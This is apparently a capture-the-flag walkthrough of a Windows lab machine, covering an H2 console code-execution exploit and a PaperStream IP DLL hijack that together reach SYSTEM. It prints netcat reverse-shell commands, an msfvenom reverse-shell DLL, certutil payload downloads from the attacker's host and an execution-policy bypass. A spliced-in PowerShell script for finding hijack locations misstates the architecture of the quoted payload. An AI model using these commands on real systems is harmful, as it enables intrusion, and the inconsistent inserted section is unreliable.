# Jacko

<figure><img src="/files/5WoCuTJtTKQi9YlcTz5P" alt=""><figcaption></figcaption></figure>

### Nmap

```
sudo nmap 192.168.67.66 -p- -sS -sV        

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
7680/tcp open  pando-pub?
8082/tcp open  http          H2 database http console
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

On port 8082 we have the login page of the H2 Console. Submitting the form with the values it pre-fills (driver class, JDBC URL and user name) logs us straight in to the console.

<figure><img src="/files/e3Njsz5syKQMmWD4buXZ" alt=""><figcaption></figcaption></figure>

Once logged in we can see that the console is H2 version 1.4.199. A search on exploit-db shows that 1.4.199 allows code execution from SQL: a `CREATE ALIAS` can bind a Java method, which the exploit uses to reach the JNI script engine and run arbitrary commands.

{% embed url="<https://www.exploit-db.com/exploits/49384>" %}

The following snippet is the exploit code we need to run in the H2 Console:

<figure><img src="/files/JLjpo7pn20Dz7UhbrC1B" alt=""><figcaption></figcaption></figure>

The section of the code that executes commands on the target machine is shown below. To achieve code execution I set up an SMB server on my attacking machine with Impacket's `smbserver.py` and placed `nc.exe` in the shared directory.

```sql
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.49.67/Share/nc.exe -e cmd.exe 192.168.49.67 8082").getInputStream()).useDelimiter("\Z").next()');
```

First, set up an SMB server sharing the directory that holds `nc.exe`:

```
python2 smbserver.py -smb2support Share /home/kali/
```

<figure><img src="/files/J51U4mbD26kBFxQf5z8g" alt=""><figcaption></figcaption></figure>

Then paste the code from exploit-db into the SQL statement box of the console, and make sure the `-- Evaluate script` section at the end contains the command that runs `nc.exe` from the attacking machine's SMB share.

<figure><img src="/files/F76U9yyrYbMx0qyBno4a" alt=""><figcaption></figcaption></figure>

When ready, run the SQL statement and we should see the target authenticate to `smbserver.py`.

<figure><img src="/files/dGroM1OTsDg1lzAGqeQN" alt=""><figcaption></figcaption></figure>

And then shortly after catch a reverse shell on our `netcat` listener.

<figure><img src="/files/jC2C6tiUpE9IjmJ5a89W" alt=""><figcaption></figcaption></figure>

The shell we land in inherits an environment with an unusable PATH, so we first reset it on the target so that the standard binaries under System32 resolve:

```
set PATH=%SystemRoot%\system32;%SystemRoot%;
```

<figure><img src="/files/ImcUCEONLDY7WKVPXcpR" alt=""><figcaption></figcaption></figure>

Looking through Program Files (x86) we can see a directory called PAPERSTREAM IP. Searching exploit-db for that software takes us to the following:

{% embed url="<https://www.exploit-db.com/exploits/49382>" %}

The description for this exploit is shown below:

```
A DLL hijack vulnerability exists in the FJTWSVIC service running as part of
the Fujitsu PaperStream IP (TWAIN) software package. This exploit searches
for a writable location, copies the specified DLL to that location and then
triggers the DLL load by sending a message to FJTWSVIC over the FjtwMkic_Fjicube_32
named pipe.

# Example payload generated as follows
# msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=eth0 LPORT=4444 
$PayloadFile = "C:\Windows\Temp\UninOldIS.dll"
```
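The description says the exploit "searches for a writable location" before dropping the DLL, which is the crux of any DLL hijack: the payload has to sit somewhere the loading process searches and the current user can write. The PowerShell below is an added example of that check, not the exploit-db script or the author's `exploit.ps1`. It walks the standard DLL search order for a service binary in an assumed install directory under Program Files (x86), probes each directory for write access by creating and deleting a random file, and reads the PE header of the payload DLL to confirm its architecture. The pipe name ends in `_32` and the page's `msfvenom` command builds a 32-bit `windows/shell_reverse_tcp` payload, so the payload should report `x86`; the install directory and payload path are assumptions.

```powershell
# Added example: enumerate DLL-hijack drop locations and check payload architecture.
# $ServiceDir and $PayloadPath are assumed values, adjust them for the target.
param(
    [string]$ServiceDir  = "${env:ProgramFiles(x86)}\PaperStream IP",   # assumed install dir
    [string]$PayloadPath = "$env:USERPROFILE\Desktop\UninOldIS.dll"     # assumed payload path
)

function Test-WritableDirectory {
    param([string]$Path)
    # Probe for write access by creating and removing a random file; an access
    # denied error lands in the catch block and the directory is reported as not writable.
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllBytes($probe, [byte[]]@(0))
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

function Get-DllSearchOrder {
    param([string]$AppDir)
    # Default (SafeDllSearchMode enabled) order: application directory, System32,
    # the 16-bit System directory, the Windows directory, the current directory,
    # then every PATH entry. A 32-bit process sees System32 redirected to SysWOW64.
    $dirs = @(
        $AppDir,
        "$env:SystemRoot\System32",
        "$env:SystemRoot\System",
        $env:SystemRoot,
        (Get-Location).Path
    ) + ($env:Path -split ';' | Where-Object { $_ -ne '' })
    $dirs | ForEach-Object { $_.TrimEnd('\') } | Select-Object -Unique
}

function Get-PeMachine {
    param([string]$Path)
    # Read the COFF header Machine field via the e_lfanew pointer at offset 0x3C.
    # 0x014c is IMAGE_FILE_MACHINE_I386 (x86), 0x8664 is IMAGE_FILE_MACHINE_AMD64 (x64).
    $bytes    = [System.IO.File]::ReadAllBytes($Path)
    $peOffset = [BitConverter]::ToInt32($bytes, 0x3C)
    if ([BitConverter]::ToUInt32($bytes, $peOffset) -ne 0x00004550) {   # "PE\0\0"
        throw "Not a PE file: $Path"
    }
    switch ([BitConverter]::ToUInt16($bytes, $peOffset + 4)) {
        0x014c  { 'x86' }
        0x8664  { 'x64' }
        default { '0x{0:x4}' -f $_ }
    }
}

# Report every directory in search order that the current user can write to.
Get-DllSearchOrder -AppDir $ServiceDir | ForEach-Object {
    [pscustomobject]@{ Directory = $_; Writable = (Test-WritableDirectory -Path $_) }
} | Where-Object Writable | Format-Table -AutoSize

# Confirm the payload matches the 32-bit service before triggering the load.
if (Test-Path -LiteralPath $PayloadPath) {
    "Payload $PayloadPath is $(Get-PeMachine -Path $PayloadPath)"
}
```

Run it from the same low-privilege shell that will later trigger the service, since write access is evaluated for the current user. A directory that is writable but not in the search order of the service is useless for the hijack, and an x64 DLL handed to a 32-bit process simply fails to load, so both checks are worth doing before the one-shot trigger over the named pipe.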

We need to change the DLL name generated by `msfvenom` and the payload location. When I attempted to download the exploit to C:\Windows\Temp, my file was deleted instantly. Possibly by AV?

First I generated a `msfvenom` shell with the DLL name the exploit requires, UninOldIS.dll:

```
msfvenom -p windows/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.49.67 LPORT=8082
```

Then I changed the `$PayloadFile` variable to point at the user's Desktop.

<figure><img src="/files/PIwVYyir9XmrZDHITkhd" alt=""><figcaption></figcaption></figure>

At this point, move into the user's Desktop and use `certutil` to download both files, since when copying them over SMB I could not get the payload to trigger without issues.

```
certutil -urlcache -split -f http://192.168.49.67/exploit.ps1 exploit.ps1
certutil -urlcache -split -f http://192.168.49.67/UninOldIS.dll UninOldIS.dll
```

Start a `netcat` listener on the attacking machine on port 8082, then execute exploit.ps1 with PowerShell on the target machine:

```
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\exploit.ps1
```

<figure><img src="/files/bafLQng6RsGy4lW9RooE" alt=""><figcaption></figcaption></figure>

A short while later we should receive a shell as SYSTEM.

<figure><img src="/files/whB5IutOfjmeJJ4zjaU5" alt=""><figcaption></figcaption></figure>
